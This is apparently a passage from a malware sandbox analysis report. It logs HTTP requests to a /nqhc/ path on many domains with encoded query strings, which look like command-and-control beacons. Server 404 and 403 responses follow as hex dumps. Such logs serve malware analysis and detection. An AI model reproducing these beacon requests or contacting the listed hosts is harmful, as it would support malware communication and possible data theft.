      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IX HTTP/1.1Host: www.royaltechglobal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&t0D=yFNHS0IX HTTP/1.1Host: www.xiaoxiuzhen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&t0D=yFNHS0IX HTTP/1.1Host: www.gumba.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&t0D=yFNHS0IX HTTP/1.1Host: www.botbillionsblaze.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&t0D=yFNHS0IX HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&t0D=yFNHS0IX HTTP/1.1Host: www.gouldent.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=8A76ZuiHZi/Ws5XZc39lk8dA+0cq1C26/U6x4YBy0tC3IrxrLO2FUR3fJNTj7bksOQnQlH1KHIWsq/xPw5a7PJ/V5JkWh/vDvg==&jP1=y48xBzJ0mzz HTTP/1.1Host: www.popular.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&jP1=y48xBzJ0mzz HTTP/1.1Host: www.wellnessprodia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=5+D/AEotBIiARx+RPOYdHDoSCIwvlBfWKmb14ofQdN1lqNdZOlbl7P8VoNd3a3Fenblb13q2VSw+uZcH+Wrp87x4A2/T8XiFdA==&jP1=y48xBzJ0mzz HTTP/1.1Host: www.pinwheeleffect.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 05 Dec 2022 14:14:45 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 05 Dec 2022 14:15:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 05 Dec 2022 14:15:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 05 Dec 2022 14:15:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 05 Dec 2022 14:15:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 65 61 72 63 68 62 6f 74 2e 73 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.searchbot.su Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:15:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 13070Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a 62 64 67 a7 ea ee 4d 5b e4 4c 4f f7 ea d5 ab 57 ff d9 d7 6f cf df ff e3 c7 57 24 35 19 1f ee ee f6 ed 2f 89 99 1a 38 dc 28 87 70 2a 92 81 03 c2 fd e9 c2 d9 dd c9 15 8c d8 f5 c0 91 49 0f 0b 4c ae 7b be 2f 93 dc cb c0 17 fa b9 43 10 60 a7 9f 02 8d 87 bb 3b 84 ec f4 33 30 94 44 29 55 1a cc c0 f9 e9 fd 37 ee 89 b3 fc 24 68 06 03 67 cc 60 92 4b 65 1c 12 49 61 40 60 ea 84 c5 26 1d c4 30 66 11 b8 e5 a5 ae db dd d9 e9 3f 73 5d f2 82 73 c2 04 79 2b 80 5c bc 7a 4b 3a 5e cb 3b f6 02 e2 12 ca a4 06 e9 45 32 23 ae 3b b4 e9 4b 9d 94 0c a5 d1 4b 7d 84 64 22 86 6b 87 f8 77 53 13 10 a0 a8 91 6a 29 fb 4e d3 fd 17 df bf c5 df 83 79 f7 19 8c 8e 14 cb 0d 31 d3 1c 81 68 9e 73 16 51 c3 a4 f0 79 7c f8 51 4b 81 90 9c 6a 8d 6f 25 59 57 47 29 64 d4 4e b8 b3 73 e3 fc 47 d9 ef da 38 3d a7 d2 f8 83 ff c1 af 52 3c a9 12 a7 e1 fc 47 a2 68 9e 3a bd 5f 30 d9 36 c1 cc 97 0a 55 8f 54 91 85 af 99 36 36 87 c5 2b 00 4a 4e 29 37 10 a5 09 97 21 e5 56 a0 0f be f8 2d 8d 3e f8 cf c3 79 31 af 8a 99 81 cc e2 bc e2 90 e1 e4 2b 9d 6c fc 7b 7c df b6 c7 73 be 28 c8 a5 66 56 08 a7 17 54 4d 9c de 02 f8 67 08 7f a4 09 6c 8b 8b 79 76 53 98 f8 9d cc 6c 55 a1 f8 16 55 b7 58 86 e2 96 84 b6 d5 67 3e c1 6d e3 e9 3a dc c5 5a 56 a3 f5 c9 6a 54 e8 0b 4d 7e 90 86 7c 23 0b 11 6f 2b 4c 0d 80 f2 e4 0a c6 4c 16 7a 3b 89 96 c4 f9 75 59 9e b7 2a a1 82 fd 5e fa 7e 6b ab c8 d5 a2 7a 96 77 36 97 bc c7 64 f2 6d 99 bd f5 b2 1b 0e 97 89 5c 96 f5 fb 0c 45 7d 1b 7e 84 c8 6c 8b 32 c9 dd 48 0a 03 c2 7c f0 8b 9c 4b 1a eb 0f 7e ab d9 6a 7d f0 83 e0 83 1f 29 99 e7 10 bb af b1 d3 1b 7a a5 dc c0 cb 45 f2 a4 91 2d 04 16 4e 58 6c 52 34 45 a7 d9 70 52 60 49 6a 9c 5e a7 8d 9b 61 96 7c 39 cd d3 a0 6f 97 17 f4 24 83 3d 9f 40 98 57 55 7f c4 55 48 5d bc a6 22 29 4a fe 0e 08 f7 a7 0b 1b d4 3f 52 65 de 8e b6 1f 09 db 6b 66 c0 da 34 54 40 e3 48 15 59 b8 75 79 3d c3 a2 d2 7a f7 9e 2a 17 b6 c1 b6 eb 9b 11 da de 91 1b 4c bd 56 a4 bc b0 34 53 50 4f 5b 3c 8e f7 eb ed ee ce 4e df d7 91 62 b9 19 da f3 33 d7 25 2f 38 27 4c 90 b7 02 c8 c5 ab b7 c4 75 87 bb bb bb d5 d3 fb 94 69 62 c7 22 f8 2b 73 c3 32 f6 3b c4 64 c2 4c 4a 4c 0a e4 1f 92 6a 53 56 e5 bc 48 10 64 1c 9c 7a 41 40 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:15:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 13070Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a 62 64 67 a7 ea ee 4d 5b e4 4c 4f f7 ea d5 ab 57 ff d9 d7 6f cf df ff e3 c7 57 24 35 19 1f ee ee f6 ed 2f 89 99 1a 38 dc 28 87 70 2a 92 81 03 c2 fd e9 c2 d9 dd c9 15 8c d8 f5 c0 91 49 0f 0b 4c ae 7b be 2f 93 dc cb c0 17 fa b9 43 10 60 a7 9f 02 8d 87 bb 3b 84 ec f4 33 30 94 44 29 55 1a cc c0 f9 e9 fd 37 ee 89 b3 fc 24 68 06 03 67 cc 60 92 4b 65 1c 12 49 61 40 60 ea 84 c5 26 1d c4 30 66 11 b8 e5 a5 ae db dd d9 e9 3f 73 5d f2 82 73 c2 04 79 2b 80 5c bc 7a 4b 3a 5e cb 3b f6 02 e2 12 ca a4 06 e9 45 32 23 ae 3b b4 e9 4b 9d 94 0c a5 d1 4b 7d 84 64 22 86 6b 87 f8 77 53 13 10 a0 a8 91 6a 29 fb 4e d3 fd 17 df bf c5 df 83 79 f7 19 8c 8e 14 cb 0d 31 d3 1c 81 68 9e 73 16 51 c3 a4 f0 79 7c f8 51 4b 81 90 9c 6a 8d 6f 25 59 57 47 29 64 d4 4e b8 b3 73 e3 fc 47 d9 ef da 38 3d a7 d2 f8 83 ff c1 af 52 3c a9 12 a7 e1 fc 47 a2 68 9e 3a bd 5f 30 d9 36 c1 cc 97 0a 55 8f 54 91 85 af 99 36 36 87 c5 2b 00 4a 4e 29 37 10 a5 09 97 21 e5 56 a0 0f be f8 2d 8d 3e f8 cf c3 79 31 af 8a 99 81 cc e2 bc e2 90 e1 e4 2b 9d 6c fc 7b 7c df b6 c7 73 be 28 c8 a5 66 56 08 a7 17 54 4d 9c de 02 f8 67 08 7f a4 09 6c 8b 8b 79 76 53 98 f8 9d cc 6c 55 a1 f8 16 55 b7 58 86 e2 96 84 b6 d5 67 3e c1 6d e3 e9 3a dc c5 5a 56 a3 f5 c9 6a 54 e8 0b 4d 7e 90 86 7c 23 0b 11 6f 2b 4c 0d 80 f2 e4 0a c6 4c 16 7a 3b 89 96 c4 f9 75 59 9e b7 2a a1 82 fd 5e fa 7e 6b ab c8 d5 a2 7a 96 77 36 97 bc c7 64 f2 6d 99 bd f5 b2 1b 0e 97 89 5c 96 f5 fb 0c 45 7d 1b 7e 84 c8 6c 8b 32 c9 dd 48 0a 03 c2 7c f0 8b 9c 4b 1a eb 0f 7e ab d9 6a 7d f0 83 e0 83 1f 29 99 e7 10 bb af b1 d3 1b 7a a5 dc c0 cb 45 f2 a4 91 2d 04 16 4e 58 6c 52 34 45 a7 d9 70 52 60 49 6a 9c 5e a7 8d 9b 61 96 7c 39 cd d3 a0 6f 97 17 f4 24 83 3d 9f 40 98 57 55 7f c4 55 48 5d bc a6 22 29 4a fe 0e 08 f7 a7 0b 1b d4 3f 52 65 de 8e b6 1f 09 db 6b 66 c0 da 34 54 40 e3 48 15 59 b8 75 79 3d c3 a2 d2 7a f7 9e 2a 17 b6 c1 b6 eb 9b 11 da de 91 1b 4c bd 56 a4 bc b0 34 53 50 4f 5b 3c 8e f7 eb ed ee ce 4e df d7 91 62 b9 19 da f3 33 d7 25 2f 38 27 4c 90 b7 02 c8 c5 ab b7 c4 75 87 bb bb bb d5 d3 fb 94 69 62 c7 22 f8 2b 73 c3 32 f6 3b c4 64 c2 4c 4a 4c 0a e4 1f 92 6a 53 56 e5 bc 48 10 64 1c 9c 7a 41 40 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Dec 2022 14:15:30 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 13070Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a 62 64 67 a7 ea ee 4d 5b e4 4c 4f f7 ea d5 ab 57 ff d9 d7 6f cf df ff e3 c7 57 24 35 19 1f ee ee f6 ed 2f 89 99 1a 38 dc 28 87 70 2a 92 81 03 c2 fd e9 c2 d9 dd c9 15 8c d8 f5 c0 91 49 0f 0b 4c ae 7b be 2f 93 dc cb c0 17 fa b9 43 10 60 a7 9f 02 8d 87 bb 3b 84 ec f4 33 30 94 44 29 55 1a cc c0 f9 e9 fd 37 ee 89 b3 fc 24 68 06 03 67 cc 60 92 4b 65 1c 12 49 61 40 60 ea 84 c5 26 1d c4 30 66 11 b8 e5 a5 ae db dd d9 e9 3f 73 5d f2 82 73 c2 04 79 2b 80 5c bc 7a 4b 3a 5e cb 3b f6 02 e2 12 ca a4 06 e9 45 32 23 ae 3b b4 e9 4b 9d 94 0c a5 d1 4b 7d 84 64 22 86 6b 87 f8 77 53 13 10 a0 a8 91 6a 29 fb 4e d3 fd 17 df bf c5 df 83 79 f7 19 8c 8e 14 cb 0d 31 d3 1c 81 68 9e 73 16 51 c3 a4 f0 79 7c f8 51 4b 81 90 9c 6a 8d 6f 25 59 57 47 29 64 d4 4e b8 b3 73 e3 fc 47 d9 ef da 38 3d a7 d2 f8 83 ff c1 af 52 3c a9 12 a7 e1 fc 47 a2 68 9e 3a bd 5f 30 d9 36 c1 cc 97 0a 55 8f 54 91 85 af 99 36 36 87 c5 2b 00 4a 4e 29 37 10 a5 09 97 21 e5 56 a0 0f be f8 2d 8d 3e f8 cf c3 79 31 af 8a 99 81 cc e2 bc e2 90 e1 e4 2b 9d 6c fc 7b 7c df b6 c7 73 be 28 c8 a5 66 56 08 a7 17 54 4d 9c de 02 f8 67 08 7f a4 09 6c 8b 8b 79 76 53 98 f8 9d cc 6c 55 a1 f8 16 55 b7 58 86 e2 96 84 b6 d5 67 3e c1 6d e3 e9 3a dc c5 5a 56 a3 f5 c9 6a 54 e8 0b 4d 7e 90 86 7c 23 0b 11 6f 2b 4c 0d 80 f2 e4 0a c6 4c 16 7a 3b 89 96 c4 f9 75 59 9e b7 2a a1 82 fd 5e fa 7e 6b ab c8 d5 a2 7a 96 77 36 97 bc c7 64 f2 6d 99 bd f5 b2 1b 0e 97 89 5c 96 f5 fb 0c 45 7d 1b 7e 84 c8 6c 8b 32 c9 dd 48 0a 03 c2 7c f0 8b 9c 4b 1a eb 0f 7e ab d9 6a 7d f0 83 e0 83 1f 29 99 e7 10 bb af b1 d3 1b 7a a5 dc c0 cb 45 f2 a4 91 2d 04 16 4e 58 6c 52 34 45 a7 d9 70 52 60 49 6a 9c 5e a7 8d 9b 61 96 7c 39 cd d3 a0 6f 97 17 f4 24 83 3d 9f 40 98 57 55 7f c4 55 48 5d bc a6 22 29 4a fe 0e 08 f7 a7 0b 1b d4 3f 52 65 de 8e b6 1f 09 db 6b 66 c0 da 34 54 40 e3 48 15 59 b8 75 79 3d c3 a2 d2 7a f7 9e 2a 17 b6 c1 b6 eb 9b 11 da de 91 1b 4c bd 56 a4 bc b0 34 53 50 4f 5b 3c 8e f7 eb ed ee ce 4e df d7 91 62 b9 19 da f3 33 d7 25 2f 38 27 4c 90 b7 02 c8 c5 ab b7 c4 75 87 bb bb bb d5 d3 fb 94 69 62 c7 22 f8 2b 73 c3 32 f6 3b c4 64 c2 4c 4a 4c 0a e4 1f 92 6a 53 56 e5 bc 48 10 64 1c 9c 7a 41 40 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Dec 2022 14:15:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: nginxVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Dec 2022 14:16:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: nginxVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Dec 2022 14:16:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: nginxVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Dec 2022 14:16:06 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
